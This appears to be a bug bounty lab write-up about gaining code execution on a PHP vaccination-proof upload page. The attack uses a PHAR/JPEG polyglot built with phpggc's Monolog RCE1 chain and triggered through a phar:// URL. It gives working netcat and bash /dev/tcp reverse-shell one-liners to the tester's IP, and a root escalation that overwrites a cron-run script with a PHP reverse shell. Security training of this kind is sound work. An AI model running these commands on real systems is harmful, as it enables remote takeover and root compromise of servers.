BugBountyHunter

Summary

Tough one,but here it is finally.The Upload vaccination proof file upload feature is vulnerable to insecure deserialization through vulnerable Monolog library.Upon doing some recon,we discover that /composer.json and /composer.lock are present,the following being returned (from /composer.json):

{
    "require": {
        "monolog/monolog": "2.1.1"
    }
}

Doing further recon about this monolog version,we discover https://github.com/ambionics/phpggc along with the Monolog/RCE1 exploit. So,upon getting the tool and running the following command:

php phpggc -pj test.jpg -o exploit.jpg monolog/rce1 system 'id'

test.jpg --> random test jpg from wikipedia --> https://en.wikipedia.org/wiki/File:Test_image.jpg, we're creating a polyglot JPEG/PHAR file with it
exploit.jpg --> the malicious file that contains the unserialized stuff & payload
monolog/rce1 --> the exploit we are using
system 'id' --> payload,we're running id on the machine

Putting it all together,now we need to upload the file on /vaccination-manager/pub/submit-vaccination-proof.php. Now in order to access the file,after successful upload,pull up the page's source code and at the bottom there is the following snippet:

<script>
    $(document).ready(function () {
        fetch('/api/checkproof.php?proof=phar:///app/firstblood/upload/9c1d42b687f399399a40b01c673fe82acb6df4f0.jpg')
                .then(response => response.json())
{...}
</script>

Obtaining the URL path,we can now either send a slightly modified request,or just navigate to it via browser,that being /api/checkproof.php?proof=phar:///app/firstblood/upload/9c1d42b687f399399a40b01c673fe82acb6df4f0.jpg.
What we're doing here is adding the php stream wrapper phar:// at the beginning which will trigger unserialize().Without adding it,we won't be able to see the output. In the end,the output is being shown.

Impact

Using this exploit attackers can achieve Remote Code Execution on the local machine,which can then be used to get a Reverse Shell and being free to roam around the machine.
A while later I was able to get a reverse shell too using the same method but instead of 'id' I did

"nc -e /bin/bash {my_ip} 9999"

or to get better shell in /bin/bash

"bash -c 'bash -i >& /dev/tcp/{my_ip}/9999 0>&1'"

since I noticed that /bin/nc is present on the machine through /api/checkproof.php?proof=/bin/nc,returning true.

And then again a while after I was able to escalate to root.I noticed the the file crontab in /app/docker which contained the following:

* * * * * root cd /app/firstblood && php scheduler.php >> /dev/null 2>&1

So since root is running this in a cron(every minute),I decided to edit scheduler.php to a php reverse shell back to my machine,which would then give drop me in a root shell.While in /app/firstblood I did the following:

echo '<?php $sock=fsockopen("{my_ip}",9998);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' > scheduler.php

Then setting up a listener,and next minute BOOM& root shell.

(Baby steps) Executing the id command via phar file upload way -->

(Growing up) Executing commands via reverse shell -->

Mission complete) Whoami? root. -->